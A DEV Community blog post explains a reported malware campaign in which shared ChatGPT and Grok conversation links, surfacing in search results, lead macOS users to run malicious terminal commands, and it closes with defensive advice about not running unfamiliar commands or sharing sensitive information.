DEV Community

Nicolás
Nicolás

Posted on

When a seemingly innoffensive conversation with AI turns malicious

AI has changed the way we interact with technology in many ways, from simple tasks such as generating text and helping with homework to more technical ones like creating web pages and assisting developers with code reviews.

One of the most significant changes has been the way we search for information. It is now common to default to an LLM such as ChatGPT, Gemini, Grok, or Claude to ask about almost anything we can think of: planning trips, searching for historical facts, explaining complex documentation, or helping us fix problems by providing step-by-step guides.

It is in this last area where cybercriminals have found a way to exploit the trust users place in these platforms, creating an attack vector that tricks users into downloading and installing malware designed to steal credentials, as reported earlier this month by the cybersecurity company Huntress.

What category does this attack fit into?

Social engineering through the “impersonation” of a legitimate LLM conversation.

How does it work?

I will leave out the technical details for the sake of simplicity and refer you to the original article. In a nutshell, the attack abuses the shareable conversation feature available in
Grok and OpenAI.

This feature allows users to generate a unique URL that can be easily shared on social media, instant messaging platforms, or public forums, and anyone with the link can access the conversation.

These conversations can be indexed by search engines and may rank highly in search results, causing them to appear at the top of the page and point to a seemingly legitimate conversation.

Why does it work?

The conversations resemble step-by-step guides on how to perform common operations on macOS devices, such as clearing storage.

Users access the link through a browser and see a real conversation with an LLM—real in the sense that it is the actual UI and platform used when interacting with Grok or ChatGPT.

This creates an element of trust, as users are familiar with these platforms. However, without realizing it, the steps include malicious terminal commands that open the user’s computer to attackers.

How to protect yourself

AI is not flawless. We all know that LLMs can hallucinate and provide made-up information in an attempt to be helpful. In that sense, this scenario is not entirely different. If an LLM were to ask for your Social Security number, your bank password, or guide you through making a bank transfer to an account number you don't know, you would not do it, right?

Here, instead of asking for sensitive information directly, the model instructs users to run commands in their device’s terminal without clearly explaining what those commands do - and those commands can be highly destructive.

The recommended precautions

  1. Never provide sensitive information.
  2. Never execute terminal commands unless you fully understand what they do, even if they appear to come from a trusted source.
  3. Follow good password hygiene to keep your accounts secure, such as never reusing passwords and using a password manager to generate strong, unique credentials.

Top comments (0)